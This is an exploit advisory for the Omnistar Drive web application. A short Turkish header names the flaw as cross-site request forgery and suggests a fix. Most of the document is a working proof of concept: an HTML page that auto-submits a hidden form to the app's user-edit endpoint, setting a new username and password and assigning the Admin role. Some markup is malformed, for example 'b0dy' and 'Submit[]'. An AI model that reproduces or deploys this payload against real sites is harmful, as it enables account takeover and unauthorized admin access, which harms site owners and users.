< ------------------- header data start ------------------- >

#############################################################

# Application Name : Omnistar Drive

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



<b0dy onLoad=Submit();>
<script>function Submit[]{document.ButterflyEffect.submit();}</script>

<form action=http://www.site.com/index.php?area=main&interface=users&sort_by=1&sort_order=ASC&page=1&return_to=@list&act=edit#
method=post name=ButterflyEffect>
<input type=hidden name=id value=>

<input type=hidden name=username id=username value=ButterflyEffect size=20 maxlength=30 class=input >
<input type=hidden name=password id=password value=ButterflyEffect size=20 maxlength=30 class=input>
<input type=hidden name=confirm id=confirm value=ButterflyEffect size=20 maxlength=30 class=input>
<input type=hidden name=first_name id=first_name value=ButterflyEffect size=20 maxlength=30 class=input>
<input type=hidden name=last_name id=last_name value=ButterflyEffect size=20 maxlength=30 class=input>
<input type=hidden name=email id=email value=[email protected] size=30 maxlength=255 class=input>
<select name=role id=role onChange=changeUserType(this); ><option value=Admin ></option>
<input type=hidden name=can_add value=checkin id=can_add_checkin>
<input type=hidden name=can_add_folders value=1 id=can_add_folders>
<input type=hidden name=must_be_reviewed value=1 id=must_be_reviewed>
<input type=hidden name=can_change_password value=1 checked id=can_change_password>
<input type=hidden name=can_mail_selected value=1 checked id=can_mail_selected>
<input type=hidden name=send_expired_email value=1 id=send_expired_email>


<input type=image src= a target=_blank href=http://img56.imageshack.us/img56/6712/kaydetr7c26ki8.gif>http://img56.imageshack.us/img56/6712/kaydetr7c26ki8.gif>


< -- bug code end of -- >